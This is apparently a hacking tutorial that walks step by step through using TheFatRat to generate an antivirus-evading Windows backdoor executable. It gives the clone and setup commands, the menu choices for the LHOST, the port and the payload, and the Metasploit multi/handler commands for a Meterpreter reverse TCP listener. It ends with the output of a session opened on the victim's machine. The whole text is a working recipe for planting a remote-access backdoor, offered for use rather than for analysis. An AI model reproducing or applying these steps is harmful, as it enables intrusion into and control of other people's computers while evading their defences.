TheFatRat by Edo Maland is a large exploitation tool that provides a malware that carries well-known payloads, provides a backdoor that makes for simple attacks including browser attacks, etc. So the compiled malware can be executed on Linux, Mac, Windows, and Android. TheFatRat provides a convenient way of generating backdoors and payloads to bypass most antiviruses.
Installation:
For Detailed Instruction: What is TheFatRat and How to Install TheFatRat in Kali Linux | How To KR
git clone https://github.com/Screetsec/TheFatRat.git cd TheFatRat chmod +x setup.sh && ./setup.sh
Step 1: Open the Terminal and run TheFatRat Script
Step 2: Now Select the Option 6 - Create FUD Backdoor with PwnWinds
Step 3: New List will be shown, select 3 to create a FUD Backdoor of EXE file with Apache + Powershell
Step 4: Now you to have find your IP, to do so type ifconfig in another terminal and search for your IP Address and Copy it.
Step 5: Enter LHOST listener/attacker IP address. Type <YOUR IP ADDRESS>
Step 6: Type port 4444 or any port number.
Step 7: Enter backdoor file name tstfile
Step 8: Now we have to choose a Payload of a given list. Choose Option 3
Step 9: Now Press enter to create a backdoor.
Step 10: Open another terminal and start msfconsole. Msfconsole will be used to handle the ongoing session.
msf5 > use exploit/multi/handler msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf5 exploit(multi/handler) > set LHOST <YOUR IP ADDRESS> LHOST => <YOUR IP ADDDRESS> msf5 exploit(multi/handler) > set LPORT 4444 LPORT => 4444 msf5 exploit(multi/handler) > exploit
When the target opens backdoor (tstfile.exe) a session will be created in windows and that can be seen in your terminal.
[] Sending stage (179779 bytes) to 192.168.1.5 [] Meterpreter session 3 opened (192.168.1.12:4444 -> 192.168.1.5:61336) at 2019-01-30 15:20:01 +0000 meterpreter >
The difference between backdoors is that in the first tutorial we had created a backdoor using C# + PowerShell to fill the target file. And in the second tutorial, we created a Backdoor using C Code. And in this tutorial where the backdoor uses an apache webserver to build a backdoor, provides the intruder with a strong backdoor. The session is not quickly ended. As in the two previous tutorials, the session ends suddenly, according to legal hacking courses, during the study.